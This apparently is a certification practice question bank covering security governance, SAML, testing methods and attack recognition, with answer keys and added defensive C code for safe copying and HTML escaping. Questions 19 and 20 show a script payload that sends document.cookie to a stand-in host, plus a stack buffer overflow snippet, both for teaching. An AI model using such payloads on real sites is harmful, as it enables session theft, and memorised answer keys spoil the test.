Ensurepass

QUESTION 11

Company ABC has recently completed the connection of its network to a national high speed private research network. Local businesses in the area are seeking sponsorship from Company ABC to connect to the high speed research network by directly connecting through Company ABC’s network. Company ABC’s Chief Information Officer (CIO) believes that this is an opportunity to increase revenues and visibility for the company, as well as promote research and development in the area.

Which of the following must Company ABC require of its sponsored partners in order to document the technical security requirements of the connection?


A. SLA

B. ISA

C. NDA

D. BPA


 

Answer: B

 

 

QUESTION 12

A security analyst at Company A has been trying to convince the Information Security Officer (ISO) to allocate budget towards the purchase of a new intrusion prevention system (IPS) capable of analyzing encrypted web transactions.

Which of the following should the analyst provide to the ISO to support the request? (Select TWO).


A. Emerging threat reports

B. Company attack trends

C. Request for Quote (RFQ)

D. Best practices

E. New technologies report

 

Answer: A,B

 

 

QUESTION 13

The IT department of a pharmaceutical research company is considering whether the company should allow or block access to social media websites during lunch time. The company is considering the possibility of allowing access only through the company’s guest wireless network, which is logically separated from the internal research network. The company prohibits the use of personal devices; therefore, such access will take place from company owned laptops.

Which of the following is the HIGHEST risk to the organization?


A. Employee’s professional reputation

B. Intellectual property confidentiality loss

C. Downloaded viruses on the company laptops

D. Workstation compromise affecting availability

 

Answer: B


 

 

QUESTION 14

A security audit has uncovered a lack of security controls with respect to employees’ network account management. Specifically, the audit reveals that employee’s network accounts are not disabled in a timely manner once an employee departs the organization. The company policy states that the network account of an employee should be disabled within eight hours of termination. However, the audit shows that 5% of the accounts were not terminated until three days after a dismissed employee departs. Furthermore, 2% of the accounts are still active.

Which of the following is the BEST course of action that the security officer can take to avoid repeat audit findings?


A. Review the HR termination process and ask the software developers to review the identity management code.

B. Enforce the company policy by conducting monthly account reviews of inactive accounts.

C. Review the termination policy with the company managers to ensure prompt reporting of employee terminations.

D. Update the company policy to account for delays and unforeseen situations in account deactivation.

 

Answer: C

 

 

QUESTION 15

Which of the following is true about an unauthenticated SAMLv2 transaction?


A. The browser asks the SP for a resource. The SP provides the browser with an XHTML format. The browser asks the IdP to validate the user, and then provides the XHTML back to the SP for access.

B. The browser asks the IdP for a resource. The IdP provides the browser with an XHTML format. The browser asks the SP to validate the user, and then provides the XHTML to the IdP for access.

C. The browser asks the IdP to validate the user. The IdP sends an XHTML form to the SP and a cookie to the browser. The browser asks for a resource to the SP, which verifies the cookie and XHTML format for access.

D. The browser asks the SP to validate the user. The SP sends an XHTML form to the IdP. The IdP provides the XHTML form back to the SP, and then the browser asks the SP for a resource.

 

Answer: A


 

 

QUESTION 16

A company which manufactures ASICs for use in an IDS wants to ensure that the ASICs’ code is not prone to buffer and integer overflows. The ASIC technology is copyrighted and the confidentiality of the ASIC code design is exceptionally important. The company is required to conduct internal vulnerability testing as well as testing by a third party.

Which of the following should be implemented in the SDLC to achieve these requirements?


A. Regression testing by the manufacturer and integration testing by the third party

B. User acceptance testing by the manufacturer and black box testing by the third party

C. Defect testing by the manufacturer and user acceptance testing by the third party

D. White box unit testing by the manufacturer and black box testing by the third party

 

Answer: D

 

 

QUESTION 17

The security administrator is receiving numerous alerts from the internal IDS of a possible Conficker infection spreading through the network via the Windows file sharing services. Given the size of the company which deploys over 20,000 workstations and 1,000 servers, the security engineer believes that the best course of action is to block the file sharing service across the organization by placing ACLs on the internal routers.

Which of the following should the security administrator do before applying the ACL?


A. Quickly research best practices with respect to stopping Conficker infections and implement the solution.

B. Consult with the rest of the security team and get approval on the solution by all the team members and the team manager.

C. Apply the ACL immediately since this is an emergency that could lead to a widespread data compromise.

D. Call an emergency change management meeting to ensure the ACL will not impact core business functions.

 

Answer: D

 

 

QUESTION 18

A company currently does not use any type of authentication or authorization service for remote access. The new security policy states that all remote access must be locked down to only authorized personnel. The policy also dictates that only authorized external networks will be allowed to access certain internal resources.

Which of the following would MOST likely need to be implemented and configured on the company’s perimeter network to comply with the new security policy? (Select TWO).


A. VPN concentrator

B. Firewall

C. Proxy server

D. WAP

E. Layer 2 switch

 

Answer: A,B

 

 

QUESTION 19

Which of the following displays an example of a buffer overflow attack?


A. <SCRIPT>
document.location='http://site.comptia/cgi-bin/script.cgi?'+document.cookie
</SCRIPT>

B. Checksums-Sha1:7be9e9bac3882beab1abb002bb5cd2302c76c48d 1157 xfig_3.2.5.b-1.dsc e0e3c9a9df6fac8f1536c2209025577edb1d1d9e 5770796 xfig_3.2.5.b.orig.tar.gz d474180fbeb6955e79bfc67520ad775a87b68d80 46856 xfig_3.2.5.b-1.diff.gz ddcba53dffd08e5d37492fbf99fe93392943c7b0 3363512 xfig-doc_3.2.5.b-1_all.deb 7773821c1a925978306d6c75ff5c579b018a2ac6 1677778 xfig-libs_3.2.5.b-1_all.deb b26c18cfb2ee2dc071b0e3bed6205c1fc0655022 739228 xfig_3.2.5.b-1_amd64.deb

C. #include <string.h>

char *code = "AAAABBBBCCCCDDD"; /* including the terminating '\0', size = 16 bytes */

int main(void)
{
    char buf[8];
    strcpy(buf, code); /* copies 16 bytes into an 8-byte stack buffer */
    return 0;
}

D. <form action="/cgi-bin/login" method=post> Username:<input type=text name=username> Password:<input type=password name=password>
<input type=submit value=Login>

 

Answer: C
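Option C overflows because strcpy() copies until it finds a '\0' and never consults the size of the destination. The following is an added example, not part of the original question bank: it keeps the vulnerable pattern in a function that is never called, measures how far the 16-byte string would overrun an 8-byte buffer, and shows a bounded replacement that refuses an oversized source instead of truncating it silently. The string CODE and the function names are assumptions chosen for this example.

```c
#include <stdio.h>
#include <string.h>

/* Constructed input (assumption): the same 15 characters as the question,
   16 bytes including the terminating '\0'. */
static const char *const CODE = "AAAABBBBCCCCDDD";

/* The vulnerable pattern from option C, kept in its own function so that
   nothing in this file ever calls it. strcpy() writes all 16 bytes, so the
   last 8 land on whatever sits above buf on the stack (canary, saved frame
   pointer, return address). */
void vulnerable_copy(const char *src)
{
    char buf[8];
    strcpy(buf, src);   /* 16 bytes into an 8-byte buffer: stack overflow */
    (void)buf;
}

/* Returns how many bytes strcpy() would write past the end of a buffer of
   bufsize bytes, or 0 if the string (with its '\0') fits. */
size_t overflow_bytes(size_t bufsize, const char *src)
{
    size_t needed = strlen(src) + 1;
    return needed > bufsize ? needed - bufsize : 0;
}

/* Hardened replacement. memchr() never reads more than dstsize bytes of
   src, so an unterminated or oversized source is rejected rather than
   copied. Returns 0 on success, -1 (with dst emptied) if src does not fit. */
int bounded_copy(char *dst, size_t dstsize, const char *src)
{
    if (dstsize == 0)
        return -1;
    const char *end = memchr(src, '\0', dstsize);
    if (end == NULL) {          /* no '\0' within dstsize bytes: too long */
        dst[0] = '\0';
        return -1;
    }
    size_t len = (size_t)(end - src);
    memcpy(dst, src, len + 1);  /* len characters plus the terminator */
    return 0;
}

int main(void)
{
    char buf[8];

    printf("strcpy of \"%s\" into %zu bytes would overflow by %zu byte(s)\n",
           CODE, sizeof buf, overflow_bytes(sizeof buf, CODE));

    if (bounded_copy(buf, sizeof buf, CODE) != 0)
        printf("bounded_copy refused the 16-byte string\n");

    if (bounded_copy(buf, sizeof buf, "AAAABBB") == 0)
        printf("bounded_copy accepted \"%s\" (7 chars + '\\0' = 8 bytes)\n", buf);

    return 0;
}
```

Note that strncpy() is not the fix: it truncates and may leave dst unterminated, which is a different bug. A bounded copy that fails loudly, as above, is what a white-box unit test (QUESTION 16) can assert on.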


 

 

QUESTION 20

Which of the following displays an example of a XSS attack?


A. <SCRIPT>
document.location='http://site.comptia/cgi-bin/script.cgi?'+document.cookie
</SCRIPT>

B. Checksums-Sha1:7be9e9bac3882beab1abb002bb5cd2302c76c48d 1157 xfig_3.2.5.b-1.dsc e0e3c9a9df6fac8f1536c2209025577edb1d1d9e 5770796 xfig_3.2.5.b.orig.tar.gz d474180fbeb6955e79bfc67520ad775a87b68d80 46856 xfig_3.2.5.b-1.diff.gz ddcba53dffd08e5d37492fbf99fe93392943c7b0 3363512 xfig-doc_3.2.5.b-1_all.deb 7773821c1a925978306d6c75ff5c579b018a2ac6 1677778 xfig-libs_3.2.5.b-1_all.deb b26c18cfb2ee2dc071b0e3bed6205c1fc0655022 739228 xfig_3.2.5.b-1_amd64.deb

C. <form action="/cgi-bin/login" method=post> Username:<input type=text name=username> Password:<input type=password name=password>
<input type=submit value=Login>

D. #include <string.h>

char *code = "AAAABBBBCCCCDDD"; /* including the terminating '\0', size = 16 bytes */

int main(void)
{
    char buf[8];
    strcpy(buf, code); /* copies 16 bytes into an 8-byte stack buffer */
    return 0;
}

 

Answer: A
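The payload in option A only runs if a server-side script (here a CGI program) writes user-supplied text into its HTML response without encoding it; the script then sends the victim's cookie to site.comptia. The following is an added example, not part of the original question bank, showing the output-encoding step a C CGI program would apply before echoing input. The payload string and function names are assumptions for this example.

```c
#include <stddef.h>
#include <string.h>

/* Constructed sample (assumption): the payload from option A as it would
   arrive in a query parameter or form field. */
static const char *const XSS_PAYLOAD =
    "<SCRIPT>document.location='http://site.comptia/cgi-bin/script.cgi?'"
    "+document.cookie</SCRIPT>";

/* HTML-encode the five characters that can change document structure when
   text is placed in an element body or a quoted attribute. Returns the
   number of bytes written (excluding the '\0'), or (size_t)-1 if out is too
   small; out is always '\0'-terminated when outsize > 0. */
size_t html_escape(const char *in, char *out, size_t outsize)
{
    size_t pos = 0;

    if (outsize == 0)
        return (size_t)-1;

    for (; *in; in++) {
        const char *rep;
        switch (*in) {
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '&':  rep = "&amp;";  break;   /* stops entity injection */
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default:   rep = NULL;     break;   /* copy the byte unchanged */
        }
        size_t n = rep ? strlen(rep) : 1;
        if (pos + n >= outsize) {           /* leave room for the '\0' */
            out[0] = '\0';
            return (size_t)-1;
        }
        if (rep)
            memcpy(out + pos, rep, n);
        else
            out[pos] = *in;
        pos += n;
    }
    out[pos] = '\0';
    return pos;
}

/* 1 if the text can still open a tag or break out of a quoted attribute. */
int contains_markup(const char *s)
{
    return strpbrk(s, "<>\"'") != NULL;
}
```

Encoding is context-specific: the table above is correct for HTML body text and quoted attributes, but text placed inside a <script> block or a URL needs JavaScript-string or percent-encoding instead. An IPS that inspects only cleartext (QUESTION 12) would not see this payload inside an HTTPS transaction.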

 

 
